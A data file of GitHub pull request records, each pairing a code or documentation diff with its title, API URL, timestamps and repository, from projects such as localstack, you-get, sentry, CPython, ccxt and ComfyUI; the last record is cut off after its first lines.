import_path = "llama_index.packs.code_hierarchy"
+[tool.llamahub.class_authors]
+CodeHierarchyAgentPack = "ryanpeach"
+
[tool.mypy]
disallow_untyped_defs = true
exclude = ["_static", "build", "examples", "notebooks", "venv"]
@@ -26,7 +28,7 @@ license = "MIT"
maintainers = ["ryanpeach"]
name = "llama-index-packs-code-hierarchy"
readme = "README.md"
-version = "0.1.0"
+version = "0.1.1"
[tool.poetry.dependencies]
python = ">=3.8.1,<3.12"
| https://api.github.com/repos/run-llama/llama_index/pulls/11776 | 2024-03-08T16:12:27Z | 2024-03-08T16:40:24Z | 2024-03-08T16:40:24Z | 2024-03-08T16:40:25Z | 329 | run-llama/llama_index | 5,999 |
|
Fix: restore deep archive object |
index 154feffd0e5da..adb027a30f04d 100644
--- a/localstack/services/s3/s3_starter.py
+++ b/localstack/services/s3/s3_starter.py
@@ -181,7 +181,8 @@ def s3_key_response_get(self, bucket_name, query, key_name, headers, *args, **kw
resp_status, resp_headers, resp_value = s3_key_response_get_orig(
bucket_name, query, key_name, headers, *args, **kwargs
)
- if resp_headers.get('x-amz-storage-class') == 'DEEP_ARCHIVE':
+
+ if resp_headers.get('x-amz-storage-class') == 'DEEP_ARCHIVE' and not resp_headers.get('x-amz-restore'):
raise InvalidObjectState()
return resp_status, resp_headers, resp_value
diff --git a/tests/integration/test_s3.py b/tests/integration/test_s3.py
index 960e0b3f357b7..ed69727ee9a51 100644
--- a/tests/integration/test_s3.py
+++ b/tests/integration/test_s3.py
@@ -1348,6 +1348,51 @@ def test_s3_get_deep_archive_object(self):
# clean up
self._delete_bucket(bucket_name, [object_key])
+ def test_s3_get_deep_archive_object_restore(self):
+ bucket_name = 'bucket-%s' % short_uid()
+ object_key = 'key-%s' % short_uid()
+
+ self.s3_client.create_bucket(Bucket=bucket_name)
+
+ # put DEEP_ARCHIVE object
+ self.s3_client.put_object(
+ Bucket=bucket_name,
+ Key=object_key,
+ Body='body data',
+ StorageClass='DEEP_ARCHIVE'
+ )
+
+ with self.assertRaises(ClientError) as ctx:
+ self.s3_client.get_object(
+ Bucket=bucket_name,
+ Key=object_key
+ )
+
+ self.assertIn('InvalidObjectState', str(ctx.exception))
+
+ # put DEEP_ARCHIVE object
+ self.s3_client.restore_object(
+ Bucket=bucket_name,
+ Key=object_key,
+ RestoreRequest={
+ 'Days': 30,
+ 'GlacierJobParameters': {
+ 'Tier': 'Bulk'
+ },
+ 'Tier': 'Bulk',
+ },
+ )
+
+ response = self.s3_client.get_object(
+ Bucket=bucket_name,
+ Key=object_key
+ )
+
+ self.assertIn('etag', response.get('ResponseMetadata').get('HTTPHeaders'))
+
+ # clean up
+ self._delete_bucket(bucket_name, [object_key])
+
def test_encoding_notification_messages(self):
key = 'a@b'
bucket_name = 'notif-enc-%s' % short_uid()
|
Fix: restore deep archive object | https://api.github.com/repos/localstack/localstack/pulls/3536 | 2021-01-30T19:51:00Z | 2021-01-31T00:04:05Z | 2021-01-31T00:04:05Z | 2021-01-31T00:04:05Z | 656 | localstack/localstack | 28,985 |
fix bilibili format | diff --git a/src/you_get/extractors/bilibili.py b/src/you_get/extractors/bilibili.py
index 7e5bdb37da..d23bbe5c87 100644
--- a/src/you_get/extractors/bilibili.py
+++ b/src/you_get/extractors/bilibili.py
@@ -28,7 +28,8 @@ class Bilibili(VideoExtractor):
live_room_init_api_url = 'https://api.live.bilibili.com/room/v1/Room/room_init?id={}'
live_room_info_api_url = 'https://api.live.bilibili.com/room/v1/Room/get_info?room_id={}'
- SEC1 = '1c15888dc316e05a15fdd0a02ed6584f'
+ #SEC1 = '1c15888dc316e05a15fdd0a02ed6584f'
+ SEC1 = '94aba54af9065f71de72f5508f1cd42e'
SEC2 = '9b288147e5474dd2aa67085f716c560d'
stream_types = [
{'id': 'hdflv'},
@@ -44,7 +45,7 @@ class Bilibili(VideoExtractor):
@staticmethod
def bilibili_stream_type(urls):
url = urls[0]
- if 'hd.flv' in url or '-112.flv' in url:
+ if 'hd.flv' in url or '-80.flv' in url:
return 'hdflv', 'flv'
if '-64.flv' in url:
return 'flv720', 'flv'
@@ -59,7 +60,8 @@ def bilibili_stream_type(urls):
def api_req(self, cid, quality, bangumi, bangumi_movie=False, **kwargs):
ts = str(int(time.time()))
if not bangumi:
- params_str = 'cid={}&player=1&quality={}&ts={}'.format(cid, quality, ts)
+ #params_str = 'cid={}&player=1&quality={}&ts={}'.format(cid, quality, ts)
+ params_str = 'appkey=84956560bc028eb7&cid={}&otype=xml&qn={}&quality={}&type='.format(cid, quality, quality)
chksum = hashlib.md5(bytes(params_str+self.SEC1, 'utf8')).hexdigest()
api_url = self.api_url + params_str + '&sign=' + chksum
else:
@@ -97,7 +99,7 @@ def download_by_vid(self, cid, bangumi, **kwargs):
quality = 'hdflv' if bangumi else 'flv'
info_only = kwargs.get('info_only')
- for qlt in range(4, -1, -1):
+ for qlt in [116,112,80,74,64,32,16,15]:
api_xml = self.api_req(cid, qlt, bangumi, **kwargs)
self.parse_bili_xml(api_xml)
if not info_only or stream_id:
| Update the XML API URL and the SEC1 key to fetch all formats of Bilibili videos. | https://api.github.com/repos/soimort/you-get/pulls/2593 | 2018-04-22T03:00:23Z | 2018-04-24T10:41:22Z | 2018-04-24T10:41:22Z | 2018-04-24T10:41:22Z | 686 | soimort/you-get | 21,376 |
Small improvement to docs | diff --git a/docs/appcontext.rst b/docs/appcontext.rst
index e9e1ad8f25..346cb09b64 100644
--- a/docs/appcontext.rst
+++ b/docs/appcontext.rst
@@ -44,8 +44,7 @@ you can have more than one application in the same Python process.
So how does the code find the “right” application? In the past we
recommended passing applications around explicitly, but that caused issues
-with libraries that were not designed with that in mind for libraries for
-which it was too inconvenient to make this work.
+with libraries that were not designed with that in mind.
A common workaround for that problem was to use the
:data:`~flask.current_app` proxy later on, which was bound to the current
diff --git a/docs/quickstart.rst b/docs/quickstart.rst
index e8b71ca98a..84ffb4889d 100644
--- a/docs/quickstart.rst
+++ b/docs/quickstart.rst
@@ -377,7 +377,7 @@ package it's actually inside your package:
/hello.html
For templates you can use the full power of Jinja2 templates. Head over
-to the the official `Jinja2 Template Documentation
+to the official `Jinja2 Template Documentation
<http://jinja.pocoo.org/2/documentation/templates>`_ for more information.
Here is an example template:
| https://api.github.com/repos/pallets/flask/pulls/562 | 2012-07-21T11:56:59Z | 2012-07-21T11:57:40Z | 2012-07-21T11:57:40Z | 2020-11-14T07:18:48Z | 316 | pallets/flask | 20,637 |
|
fix(crons): Fix re-opening closed check-ins on the consumer | diff --git a/src/sentry/monitors/consumers/monitor_consumer.py b/src/sentry/monitors/consumers/monitor_consumer.py
index ef498c3079c0a3..5d07b3bda98cae 100644
--- a/src/sentry/monitors/consumers/monitor_consumer.py
+++ b/src/sentry/monitors/consumers/monitor_consumer.py
@@ -171,6 +171,18 @@ def _process_message(wrapper: Dict) -> None:
monitor=monitor,
)
+ if check_in.status in CheckInStatus.FINISHED_VALUES:
+ metrics.incr(
+ "monitors.checkin.result",
+ tags={"source": "consumer", "status": "checkin_finished"},
+ )
+ logger.debug(
+ "check-in was finished: attempted update from %s to %s",
+ check_in.status,
+ status,
+ )
+ return
+
if duration is None:
duration = int((start_time - check_in.date_added).total_seconds() * 1000)
diff --git a/tests/sentry/monitors/test_monitor_consumer.py b/tests/sentry/monitors/test_monitor_consumer.py
index 7407dd7b45335c..265cf0c6a4df40 100644
--- a/tests/sentry/monitors/test_monitor_consumer.py
+++ b/tests/sentry/monitors/test_monitor_consumer.py
@@ -1,6 +1,6 @@
import uuid
from datetime import datetime
-from typing import Any, Dict
+from typing import Any, Dict, Optional
from unittest import mock
import msgpack
@@ -30,9 +30,11 @@
class MonitorConsumerTest(TestCase):
- def get_message(self, monitor_slug: str, **overrides: Any) -> Dict[str, Any]:
+ def get_message(
+ self, monitor_slug: str, guid: Optional[str] = None, **overrides: Any
+ ) -> Dict[str, Any]:
now = datetime.now()
- self.guid = uuid.uuid4().hex
+ self.guid = uuid.uuid4().hex if not guid else guid
payload = {
"monitor_slug": monitor_slug,
"status": "ok",
@@ -164,13 +166,29 @@ def test_disabled(self):
@pytest.mark.django_db
def test_check_in_update(self):
monitor = self._create_monitor(slug="my-monitor")
- message = self.get_message(monitor.slug)
- _process_message(message)
- _process_message(message)
+ _process_message(self.get_message(monitor.slug, status="in_progress"))
+ _process_message(self.get_message(monitor.slug, guid=self.guid))
checkin = MonitorCheckIn.objects.get(guid=self.guid)
assert checkin.duration is not None
+ @pytest.mark.django_db
+ def test_check_in_update_terminal(self):
+ monitor = self._create_monitor(slug="my-monitor")
+ done_message = self.get_message(monitor.slug, duration=10.0)
+ _process_message(done_message)
+ _process_message(self.get_message(monitor.slug, guid=self.guid, status="in_progress"))
+
+ checkin = MonitorCheckIn.objects.get(guid=self.guid)
+ assert checkin.duration == int(10.0 * 1000)
+
+ error_message = self.get_message(monitor.slug, duration=20.0, status="error")
+ _process_message(error_message)
+ _process_message(self.get_message(monitor.slug, guid=self.guid, status="in_progress"))
+
+ checkin = MonitorCheckIn.objects.get(guid=self.guid)
+ assert checkin.duration == int(20.0 * 1000)
+
@pytest.mark.django_db
def test_monitor_environment(self):
monitor = self._create_monitor(slug="my-monitor")
| Fixes the incorrect "re-opening" of closed check-ins on the consumer. Validation logic now lines up with the HTTP API. | https://api.github.com/repos/getsentry/sentry/pulls/49357 | 2023-05-17T20:31:15Z | 2023-05-17T20:54:18Z | 2023-05-17T20:54:18Z | 2023-06-02T01:16:39Z | 832 | getsentry/sentry | 44,766 |
Video recorder: distinguish input and output fps | diff --git a/gym/wrappers/monitoring/video_recorder.py b/gym/wrappers/monitoring/video_recorder.py
index 88a35e5a667..7af82bf026f 100644
--- a/gym/wrappers/monitoring/video_recorder.py
+++ b/gym/wrappers/monitoring/video_recorder.py
@@ -76,6 +76,7 @@ def __init__(self, env, path=None, metadata=None, enabled=True, base_path=None):
touch(path)
self.frames_per_sec = env.metadata.get('video.frames_per_second', 30)
+ self.output_frames_per_sec = env.metadata.get('video.output_frames_per_second', self.frames_per_sec)
self.encoder = None # lazily start the process
self.broken = False
@@ -159,7 +160,7 @@ def _encode_ansi_frame(self, frame):
def _encode_image_frame(self, frame):
if not self.encoder:
- self.encoder = ImageEncoder(self.path, frame.shape, self.frames_per_sec)
+ self.encoder = ImageEncoder(self.path, frame.shape, self.frames_per_sec, self.output_frames_per_sec)
self.metadata['encoder_version'] = self.encoder.version_info
try:
@@ -235,7 +236,7 @@ def version_info(self):
return {'backend':'TextEncoder','version':1}
class ImageEncoder(object):
- def __init__(self, output_path, frame_shape, frames_per_sec):
+ def __init__(self, output_path, frame_shape, frames_per_sec, output_frames_per_sec):
self.proc = None
self.output_path = output_path
# Frame shape should be lines-first, so w and h are swapped
@@ -246,6 +247,7 @@ def __init__(self, output_path, frame_shape, frames_per_sec):
self.includes_alpha = (pixfmt == 4)
self.frame_shape = frame_shape
self.frames_per_sec = frames_per_sec
+ self.output_frames_per_sec = output_frames_per_sec
if distutils.spawn.find_executable('avconv') is not None:
self.backend = 'avconv'
@@ -270,18 +272,19 @@ def start(self):
'-nostats',
'-loglevel', 'error', # suppress warnings
'-y',
- '-r', '%d' % self.frames_per_sec,
# input
'-f', 'rawvideo',
'-s:v', '{}x{}'.format(*self.wh),
'-pix_fmt',('rgb32' if self.includes_alpha else 'rgb24'),
+ '-framerate', '%d' % self.frames_per_sec,
'-i', '-', # this used to be /dev/stdin, which is not Windows-friendly
# output
'-vf', 'scale=trunc(iw/2)*2:trunc(ih/2)*2',
'-vcodec', 'libx264',
'-pix_fmt', 'yuv420p',
+ '-r', '%d' % self.output_frames_per_sec,
self.output_path
)
| Common video players such as VLC or QuickTime struggle to play videos with a low framerate, which is problematic for environments where the policy frequency is low (e.g. 1 Hz).
See: https://superuser.com/a/601916
This commit sets:
- The input image sequence framerate to the metadata 'video.frames_per_second'
- The output video framerate to at least 30 fps | https://api.github.com/repos/openai/gym/pulls/1817 | 2020-02-21T10:47:05Z | 2020-02-29T00:05:19Z | 2020-02-29T00:05:19Z | 2020-02-29T00:05:19Z | 671 | openai/gym | 5,856 |
bpo-43751: Fix anext() bug where it erroneously returned None | diff --git a/Lib/test/test_asyncgen.py b/Lib/test/test_asyncgen.py
index 99464e3d0929fd..77c15c02bc8914 100644
--- a/Lib/test/test_asyncgen.py
+++ b/Lib/test/test_asyncgen.py
@@ -372,11 +372,8 @@ def tearDown(self):
self.loop = None
asyncio.set_event_loop_policy(None)
- def test_async_gen_anext(self):
- async def gen():
- yield 1
- yield 2
- g = gen()
+ def check_async_iterator_anext(self, ait_class):
+ g = ait_class()
async def consume():
results = []
results.append(await anext(g))
@@ -388,6 +385,66 @@ async def consume():
with self.assertRaises(StopAsyncIteration):
self.loop.run_until_complete(consume())
+ async def test_2():
+ g1 = ait_class()
+ self.assertEqual(await anext(g1), 1)
+ self.assertEqual(await anext(g1), 2)
+ with self.assertRaises(StopAsyncIteration):
+ await anext(g1)
+ with self.assertRaises(StopAsyncIteration):
+ await anext(g1)
+
+ g2 = ait_class()
+ self.assertEqual(await anext(g2, "default"), 1)
+ self.assertEqual(await anext(g2, "default"), 2)
+ self.assertEqual(await anext(g2, "default"), "default")
+ self.assertEqual(await anext(g2, "default"), "default")
+
+ return "completed"
+
+ result = self.loop.run_until_complete(test_2())
+ self.assertEqual(result, "completed")
+
+ def test_async_generator_anext(self):
+ async def agen():
+ yield 1
+ yield 2
+ self.check_async_iterator_anext(agen)
+
+ def test_python_async_iterator_anext(self):
+ class MyAsyncIter:
+ """Asynchronously yield 1, then 2."""
+ def __init__(self):
+ self.yielded = 0
+ def __aiter__(self):
+ return self
+ async def __anext__(self):
+ if self.yielded >= 2:
+ raise StopAsyncIteration()
+ else:
+ self.yielded += 1
+ return self.yielded
+ self.check_async_iterator_anext(MyAsyncIter)
+
+ def test_python_async_iterator_types_coroutine_anext(self):
+ import types
+ class MyAsyncIterWithTypesCoro:
+ """Asynchronously yield 1, then 2."""
+ def __init__(self):
+ self.yielded = 0
+ def __aiter__(self):
+ return self
+ @types.coroutine
+ def __anext__(self):
+ if False:
+ yield "this is a generator-based coroutine"
+ if self.yielded >= 2:
+ raise StopAsyncIteration()
+ else:
+ self.yielded += 1
+ return self.yielded
+ self.check_async_iterator_anext(MyAsyncIterWithTypesCoro)
+
def test_async_gen_aiter(self):
async def gen():
yield 1
@@ -431,12 +488,85 @@ async def call_with_too_many_args():
await anext(gen(), 1, 3)
async def call_with_wrong_type_args():
await anext(1, gen())
+ async def call_with_kwarg():
+ await anext(aiterator=gen())
with self.assertRaises(TypeError):
self.loop.run_until_complete(call_with_too_few_args())
with self.assertRaises(TypeError):
self.loop.run_until_complete(call_with_too_many_args())
with self.assertRaises(TypeError):
self.loop.run_until_complete(call_with_wrong_type_args())
+ with self.assertRaises(TypeError):
+ self.loop.run_until_complete(call_with_kwarg())
+
+ def test_anext_bad_await(self):
+ async def bad_awaitable():
+ class BadAwaitable:
+ def __await__(self):
+ return 42
+ class MyAsyncIter:
+ def __aiter__(self):
+ return self
+ def __anext__(self):
+ return BadAwaitable()
+ regex = r"__await__.*iterator"
+ awaitable = anext(MyAsyncIter(), "default")
+ with self.assertRaisesRegex(TypeError, regex):
+ await awaitable
+ awaitable = anext(MyAsyncIter())
+ with self.assertRaisesRegex(TypeError, regex):
+ await awaitable
+ return "completed"
+ result = self.loop.run_until_complete(bad_awaitable())
+ self.assertEqual(result, "completed")
+
+ async def check_anext_returning_iterator(self, aiter_class):
+ awaitable = anext(aiter_class(), "default")
+ with self.assertRaises(TypeError):
+ await awaitable
+ awaitable = anext(aiter_class())
+ with self.assertRaises(TypeError):
+ await awaitable
+ return "completed"
+
+ def test_anext_return_iterator(self):
+ class WithIterAnext:
+ def __aiter__(self):
+ return self
+ def __anext__(self):
+ return iter("abc")
+ result = self.loop.run_until_complete(self.check_anext_returning_iterator(WithIterAnext))
+ self.assertEqual(result, "completed")
+
+ def test_anext_return_generator(self):
+ class WithGenAnext:
+ def __aiter__(self):
+ return self
+ def __anext__(self):
+ yield
+ result = self.loop.run_until_complete(self.check_anext_returning_iterator(WithGenAnext))
+ self.assertEqual(result, "completed")
+
+ def test_anext_await_raises(self):
+ class RaisingAwaitable:
+ def __await__(self):
+ raise ZeroDivisionError()
+ yield
+ class WithRaisingAwaitableAnext:
+ def __aiter__(self):
+ return self
+ def __anext__(self):
+ return RaisingAwaitable()
+ async def do_test():
+ awaitable = anext(WithRaisingAwaitableAnext())
+ with self.assertRaises(ZeroDivisionError):
+ await awaitable
+ awaitable = anext(WithRaisingAwaitableAnext(), "default")
+ with self.assertRaises(ZeroDivisionError):
+ await awaitable
+ return "completed"
+ result = self.loop.run_until_complete(do_test())
+ self.assertEqual(result, "completed")
def test_aiter_bad_args(self):
async def gen():
diff --git a/Misc/NEWS.d/next/Core and Builtins/2021-04-07-18-00-05.bpo-43751.8fHsqQ.rst b/Misc/NEWS.d/next/Core and Builtins/2021-04-07-18-00-05.bpo-43751.8fHsqQ.rst
new file mode 100644
index 00000000000000..75951ae794d106
--- /dev/null
+++ b/Misc/NEWS.d/next/Core and Builtins/2021-04-07-18-00-05.bpo-43751.8fHsqQ.rst
@@ -0,0 +1 @@
+Fixed a bug where ``anext(ait, default)`` would erroneously return None.
\ No newline at end of file
diff --git a/Objects/iterobject.c b/Objects/iterobject.c
index f0c6b799176804..c316de4e32c6b2 100644
--- a/Objects/iterobject.c
+++ b/Objects/iterobject.c
@@ -316,7 +316,52 @@ anextawaitable_traverse(anextawaitableobject *obj, visitproc visit, void *arg)
static PyObject *
anextawaitable_iternext(anextawaitableobject *obj)
{
- PyObject *result = PyIter_Next(obj->wrapped);
+ /* Consider the following class:
+ *
+ * class A:
+ * async def __anext__(self):
+ * ...
+ * a = A()
+ *
+ * Then `await anext(a)` should call
+ * a.__anext__().__await__().__next__()
+ *
+ * On the other hand, given
+ *
+ * async def agen():
+ * yield 1
+ * yield 2
+ * gen = agen()
+ *
+ * Then `await anext(gen)` can just call
+ * gen.__anext__().__next__()
+ */
+ assert(obj->wrapped != NULL);
+ PyObject *awaitable = _PyCoro_GetAwaitableIter(obj->wrapped);
+ if (awaitable == NULL) {
+ return NULL;
+ }
+ if (Py_TYPE(awaitable)->tp_iternext == NULL) {
+ /* _PyCoro_GetAwaitableIter returns a Coroutine, a Generator,
+ * or an iterator. Of these, only coroutines lack tp_iternext.
+ */
+ assert(PyCoro_CheckExact(awaitable));
+ unaryfunc getter = Py_TYPE(awaitable)->tp_as_async->am_await;
+ PyObject *new_awaitable = getter(awaitable);
+ if (new_awaitable == NULL) {
+ Py_DECREF(awaitable);
+ return NULL;
+ }
+ Py_SETREF(awaitable, new_awaitable);
+ if (Py_TYPE(awaitable)->tp_iternext == NULL) {
+ PyErr_SetString(PyExc_TypeError,
+ "__await__ returned a non-iterable");
+ Py_DECREF(awaitable);
+ return NULL;
+ }
+ }
+ PyObject *result = (*Py_TYPE(awaitable)->tp_iternext)(awaitable);
+ Py_DECREF(awaitable);
if (result != NULL) {
return result;
}
| <!--
Thanks for your contribution!
Please read this comment in its entirety. It's quite important.
# Pull Request title
It should be in the following format:
```
bpo-NNNN: Summary of the changes made
```
Where: bpo-NNNN refers to the issue number in the https://bugs.python.org.
Most PRs will require an issue number. Trivial changes, like fixing a typo, do not need an issue.
# Backport Pull Request title
If this is a backport PR (PR made against branches other than `master`),
please ensure that the PR title is in the following format:
```
[X.Y] <title from the original PR> (GH-NNNN)
```
Where: [X.Y] is the branch name, e.g. [3.6].
GH-NNNN refers to the PR number from `master`.
-->
<!-- issue-number: [bpo-43751](https://bugs.python.org/issue43751) -->
https://bugs.python.org/issue43751
<!-- /issue-number -->
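For context, a small reproduction sketch modelled on the new `MyAsyncIter` test case (needs Python 3.10+ for the `anext()` builtin; the pre-fix behaviour noted in the comment is taken from the NEWS entry):
```python
import asyncio

class MyAsyncIter:
    """Asynchronously yield 1, then 2."""
    def __init__(self):
        self.yielded = 0
    def __aiter__(self):
        return self
    async def __anext__(self):
        if self.yielded >= 2:
            raise StopAsyncIteration()
        self.yielded += 1
        return self.yielded

async def main():
    it = MyAsyncIter()
    print(await anext(it, "default"))  # 1
    print(await anext(it, "default"))  # 2
    print(await anext(it, "default"))  # "default" (erroneously None before this fix)

asyncio.run(main())
```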
| https://api.github.com/repos/python/cpython/pulls/25238 | 2021-04-07T00:36:39Z | 2021-04-11T04:51:36Z | 2021-04-11T04:51:36Z | 2021-12-19T05:46:56Z | 2,230 | python/cpython | 4,466 |
btcturk: use string in safeTicker ccxt/ccxt#11379 | diff --git a/js/btcturk.js b/js/btcturk.js
index 02891213cee5..29d9a2ef7906 100644
--- a/js/btcturk.js
+++ b/js/btcturk.js
@@ -289,29 +289,29 @@ module.exports = class btcturk extends Exchange {
market = this.safeMarket (marketId, market);
const symbol = market['symbol'];
const timestamp = this.safeInteger (ticker, 'timestamp');
- const last = this.safeNumber (ticker, 'last');
+ const last = this.safeString (ticker, 'last');
return this.safeTicker ({
'symbol': symbol,
'timestamp': timestamp,
'datetime': this.iso8601 (timestamp),
- 'high': this.safeNumber (ticker, 'high'),
- 'low': this.safeNumber (ticker, 'low'),
- 'bid': this.safeNumber (ticker, 'bid'),
+ 'high': this.safeString (ticker, 'high'),
+ 'low': this.safeString (ticker, 'low'),
+ 'bid': this.safeString (ticker, 'bid'),
'bidVolume': undefined,
- 'ask': this.safeNumber (ticker, 'ask'),
+ 'ask': this.safeString (ticker, 'ask'),
'askVolume': undefined,
'vwap': undefined,
- 'open': this.safeNumber (ticker, 'open'),
+ 'open': this.safeString (ticker, 'open'),
'close': last,
'last': last,
'previousClose': undefined,
- 'change': this.safeNumber (ticker, 'daily'),
- 'percentage': this.safeNumber (ticker, 'dailyPercent'),
- 'average': this.safeNumber (ticker, 'average'),
- 'baseVolume': this.safeNumber (ticker, 'volume'),
+ 'change': this.safeString (ticker, 'daily'),
+ 'percentage': this.safeString (ticker, 'dailyPercent'),
+ 'average': this.safeString (ticker, 'average'),
+ 'baseVolume': this.safeString (ticker, 'volume'),
'quoteVolume': undefined,
'info': ticker,
- }, market);
+ }, market, false);
}
async fetchTickers (symbols = undefined, params = {}) {
| ccxt/ccxt#11379 | https://api.github.com/repos/ccxt/ccxt/pulls/11459 | 2022-01-19T15:26:26Z | 2022-01-21T22:58:59Z | 2022-01-21T22:58:59Z | 2022-01-21T22:58:59Z | 510 | ccxt/ccxt | 13,465 |
🌐 Add Chinese translation for Advanced - Additional Status Codes | diff --git a/docs/zh/docs/advanced/additional-status-codes.md b/docs/zh/docs/advanced/additional-status-codes.md
new file mode 100644
index 0000000000000..1cb724f1db142
--- /dev/null
+++ b/docs/zh/docs/advanced/additional-status-codes.md
@@ -0,0 +1,37 @@
+# 额外的状态码
+
+**FastAPI** 默认使用 `JSONResponse` 返回一个响应,将你的 *路径操作* 中的返回内容放到该 `JSONResponse` 中。
+
+**FastAPI** 会自动使用默认的状态码或者使用你在 *路径操作* 中设置的状态码。
+
+## 额外的状态码
+
+如果你想要返回主要状态码之外的状态码,你可以通过直接返回一个 `Response` 来实现,比如 `JSONResponse`,然后直接设置额外的状态码。
+
+例如,假设你想有一个 *路径操作* 能够更新条目,并且更新成功时返回 200 「成功」 的 HTTP 状态码。
+
+但是你也希望它能够接受新的条目。并且当这些条目不存在时,会自动创建并返回 201 「创建」的 HTTP 状态码。
+
+要实现它,导入 `JSONResponse`,然后在其中直接返回你的内容,并将 `status_code` 设置为为你要的值。
+
+```Python hl_lines="2 19"
+{!../../../docs_src/additional_status_codes/tutorial001.py!}
+```
+
+!!! warning "警告"
+ 当你直接返回一个像上面例子中的 `Response` 对象时,它会直接返回。
+
+ FastAPI 不会用模型等对该响应进行序列化。
+
+ 确保其中有你想要的数据,且返回的值为合法的 JSON(如果你使用 `JSONResponse` 的话)。
+
+!!! note "技术细节"
+ 你也可以使用 `from starlette.responses import JSONResponse`。
+
+ 出于方便,**FastAPI** 为开发者提供同 `starlette.responses` 一样的 `fastapi.responses`。但是大多数可用的响应都是直接来自 Starlette。`status` 也是一样。
+
+## OpenAPI 和 API 文档
+
+如果你直接返回额外的状态码和响应,它们不会包含在 OpenAPI 方案(API 文档)中,因为 FastAPI 没办法预先知道你要返回什么。
+
+但是你可以使用 [额外的响应](additional-responses.md){.internal-link target=_blank} 在代码中记录这些内容。
diff --git a/docs/zh/mkdocs.yml b/docs/zh/mkdocs.yml
index c57aae8cc452c..f50c080f9506d 100644
--- a/docs/zh/mkdocs.yml
+++ b/docs/zh/mkdocs.yml
@@ -63,6 +63,7 @@ nav:
- 高级用户指南:
- advanced/index.md
- advanced/path-operation-advanced-configuration.md
+ - advanced/additional-status-codes.md
- deployment.md
- contributing.md
- help-fastapi.md
| Add Chinese docs for advanced/additional-status-codes | https://api.github.com/repos/tiangolo/fastapi/pulls/1451 | 2020-05-22T03:08:49Z | 2020-11-25T17:16:21Z | 2020-11-25T17:16:21Z | 2020-11-25T17:16:21Z | 712 | tiangolo/fastapi | 23,011 |
Simple undo/redo | diff --git a/web/extensions/core/undoRedo.js b/web/extensions/core/undoRedo.js
new file mode 100644
index 0000000000..c6613b0f02
--- /dev/null
+++ b/web/extensions/core/undoRedo.js
@@ -0,0 +1,150 @@
+import { app } from "../../scripts/app.js";
+
+const MAX_HISTORY = 50;
+
+let undo = [];
+let redo = [];
+let activeState = null;
+let isOurLoad = false;
+function checkState() {
+ const currentState = app.graph.serialize();
+ if (!graphEqual(activeState, currentState)) {
+ undo.push(activeState);
+ if (undo.length > MAX_HISTORY) {
+ undo.shift();
+ }
+ activeState = clone(currentState);
+ redo.length = 0;
+ }
+}
+
+const loadGraphData = app.loadGraphData;
+app.loadGraphData = async function () {
+ const v = await loadGraphData.apply(this, arguments);
+ if (isOurLoad) {
+ isOurLoad = false;
+ } else {
+ checkState();
+ }
+ return v;
+};
+
+function clone(obj) {
+ try {
+ if (typeof structuredClone !== "undefined") {
+ return structuredClone(obj);
+ }
+ } catch (error) {
+ // structuredClone is stricter than using JSON.parse/stringify so fallback to that
+ }
+
+ return JSON.parse(JSON.stringify(obj));
+}
+
+function graphEqual(a, b, root = true) {
+ if (a === b) return true;
+
+ if (typeof a == "object" && a && typeof b == "object" && b) {
+ const keys = Object.getOwnPropertyNames(a);
+
+ if (keys.length != Object.getOwnPropertyNames(b).length) {
+ return false;
+ }
+
+ for (const key of keys) {
+ let av = a[key];
+ let bv = b[key];
+ if (root && key === "nodes") {
+ // Nodes need to be sorted as the order changes when selecting nodes
+ av = [...av].sort((a, b) => a.id - b.id);
+ bv = [...bv].sort((a, b) => a.id - b.id);
+ }
+ if (!graphEqual(av, bv, false)) {
+ return false;
+ }
+ }
+
+ return true;
+ }
+
+ return false;
+}
+
+const undoRedo = async (e) => {
+ if (e.ctrlKey || e.metaKey) {
+ if (e.key === "y") {
+ const prevState = redo.pop();
+ if (prevState) {
+ undo.push(activeState);
+ isOurLoad = true;
+ await app.loadGraphData(prevState);
+ activeState = prevState;
+ }
+ return true;
+ } else if (e.key === "z") {
+ const prevState = undo.pop();
+ if (prevState) {
+ redo.push(activeState);
+ isOurLoad = true;
+ await app.loadGraphData(prevState);
+ activeState = prevState;
+ }
+ return true;
+ }
+ }
+};
+
+const bindInput = (activeEl) => {
+ if (activeEl?.tagName !== "CANVAS" && activeEl?.tagName !== "BODY") {
+ for (const evt of ["change", "input", "blur"]) {
+ if (`on${evt}` in activeEl) {
+ const listener = () => {
+ checkState();
+ activeEl.removeEventListener(evt, listener);
+ };
+ activeEl.addEventListener(evt, listener);
+ return true;
+ }
+ }
+ }
+};
+
+window.addEventListener(
+ "keydown",
+ (e) => {
+ requestAnimationFrame(async () => {
+ const activeEl = document.activeElement;
+ if (activeEl?.tagName === "INPUT" || activeEl?.type === "textarea") {
+ // Ignore events on inputs, they have their native history
+ return;
+ }
+
+ // Check if this is a ctrl+z ctrl+y
+ if (await undoRedo(e)) return;
+
+ // If our active element is some type of input then handle changes after they're done
+ if (bindInput(activeEl)) return;
+ checkState();
+ });
+ },
+ true
+);
+
+// Handle clicking DOM elements (e.g. widgets)
+window.addEventListener("mouseup", () => {
+ checkState();
+});
+
+// Handle litegraph clicks
+const processMouseUp = LGraphCanvas.prototype.processMouseUp;
+LGraphCanvas.prototype.processMouseUp = function (e) {
+ const v = processMouseUp.apply(this, arguments);
+ checkState();
+ return v;
+};
+const processMouseDown = LGraphCanvas.prototype.processMouseDown;
+LGraphCanvas.prototype.processMouseDown = function (e) {
+ const v = processMouseDown.apply(this, arguments);
+ checkState();
+ return v;
+};
| Adds a very simple undo/redo implementation.
Litegraph has the beginnings of before/after change events; however, they're missing from a lot of key actions.
This just handles mouse/keyboard events and checks whether the graph differs from the previous state, which seems like a reliable way of catching any changes.
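Condensed into a rough Python-style sketch (the actual implementation above is JavaScript):
```python
MAX_HISTORY = 50
undo, redo = [], []
active_state = None  # last known serialized graph

def check_state(current_state):
    """Push the previous graph onto the undo stack when it actually changed."""
    global active_state
    if active_state is not None and current_state != active_state:
        undo.append(active_state)
        if len(undo) > MAX_HISTORY:
            undo.pop(0)   # keep at most 50 history states
        redo.clear()      # a fresh change invalidates the redo stack
    active_state = current_state
```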
It stores the entire serialized graph for each history state, which isn't great, but with the history capped at 50 entries it should be fine in real use. | https://api.github.com/repos/comfyanonymous/ComfyUI/pulls/2080 | 2023-11-27T18:57:39Z | 2023-11-28T03:41:58Z | 2023-11-28T03:41:58Z | 2023-11-29T09:03:19Z | 1,142 | comfyanonymous/ComfyUI | 17,830 |
✨ Support Python internal description on Pydantic model's docstring | diff --git a/fastapi/utils.py b/fastapi/utils.py
index 0ced0125223a4..89f54453b5a90 100644
--- a/fastapi/utils.py
+++ b/fastapi/utils.py
